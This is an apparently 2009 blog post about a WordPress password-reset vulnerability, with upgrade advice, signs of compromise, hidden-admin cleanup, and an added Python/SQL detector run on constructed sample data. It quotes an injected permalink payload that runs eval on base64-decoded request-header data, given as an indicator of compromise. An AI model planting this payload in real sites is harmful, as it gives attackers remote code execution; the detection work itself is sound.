WordPress is under attack!
A security vulnerability affecting WordPress versions 2.8.3 and older was discovered on August 10, 2009, and the patch for it was released on August 11, 2009. If you are running version 2.8.4 or higher then you’re safe. This vulnerability allows someone with a specially crafted URL to reset the password of the first user in the database (typically the admin account), bypassing WordPress’ security. This is a serious issue and you should update to the latest version of WordPress immediately!!!
How do I upgrade my version of WordPress?
Since WordPress version 2.7 there has been a built-in automatic upgrade feature that can be reached in a couple of ways. First and most obvious is the dashboard: the home admin page of WordPress displays the version you are currently using and offers an option to upgrade if a newer version exists. Second, click the Tools option on the left-hand side and then choose Upgrade. If you are running a version older than 2.7, which does not have the automatic upgrade feature, then read this. Please don’t wait, upgrade immediately.
How can I tell if I’ve been hacked?
If the permalinks to your posts look like:
or
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
you’ve been hacked!
What do I do if my WordPress site has been hacked?
First, upgrade WordPress to the latest version. Then, check whether any “hidden” administrators have been added. If you don’t have a lot of registered users, the easiest way to find users is in the table “wp_users” (assuming you kept the default “wp_” prefix during the WordPress install) in your WordPress database. To verify that a user you found has admin rights, take the number from the “ID” column of “wp_users” and look for it in the “user_id” column of “wp_usermeta”; the user’s role is stored in the row whose “meta_key” is “wp_capabilities”. If that row’s “meta_value” contains “administrator”, then this user has administrator rights to your WordPress blog.
I found another great article from Journey etc explaining a different way to find a hidden user.
Then, set your permalinks back to the way they were. This should get your site functional again. However, since you’ve been hacked and administrative rights have been compromised, I suggest you keep looking for other pieces of code that may have been inserted.
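The two checks described above, the hijacked permalink structure and the hidden-administrator lookup, as an added example that is not code from the original post or from WordPress itself. It runs against a constructed in-memory SQLite copy of the three relevant tables; the sample rows, the regular expression and the query are my own assumptions, and the query is written so the same SQL can be pasted into phpMyAdmin against a real MySQL database.

```python
import re
import sqlite3
from urllib.parse import unquote

# Signature of the injected permalink structure quoted above: a PHP eval() of
# base64-decoded data taken from a request header.
INJECTED_PERMALINK_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

def permalink_is_hijacked(permalink_structure: str) -> bool:
    """True if the (percent-encoded) permalink structure carries eval(base64_decode())."""
    return INJECTED_PERMALINK_RE.search(unquote(permalink_structure)) is not None

# Roles live in wp_usermeta, keyed by user_id, under meta_key 'wp_capabilities' as a
# serialized PHP array. Change the "wp_" prefix if the install used another one.
ADMIN_QUERY = """
SELECT u.ID, u.user_login
FROM wp_users AS u
JOIN wp_usermeta AS m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'
ORDER BY u.ID
"""

def build_sample_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a WordPress database (sample data, not a real site)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
        CREATE TABLE wp_options (option_name TEXT PRIMARY KEY, option_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_users VALUES (?, ?)",
                     [(1, "admin"), (2, "editor"), (3, "reader")])
    # User 3 looks harmless in wp_users but has been granted administrator (constructed).
    conn.executemany(
        "INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)",
        [(1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
         (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
         (3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
         (3, "nickname", "reader")])
    # Permalink structure as hijacked, using the string quoted on this page.
    conn.execute("INSERT INTO wp_options VALUES ('permalink_structure', ?)",
                 ("/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%",))
    return conn

def find_administrators(conn: sqlite3.Connection) -> list:
    """Every user holding the administrator capability, hidden or not."""
    return conn.execute(ADMIN_QUERY).fetchall()
```

On the sample data `find_administrators` reports user 3 alongside the real admin, which is exactly the account a scan of `wp_users` alone would miss.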
I also read a great article about this at Lorelle on Wordpress.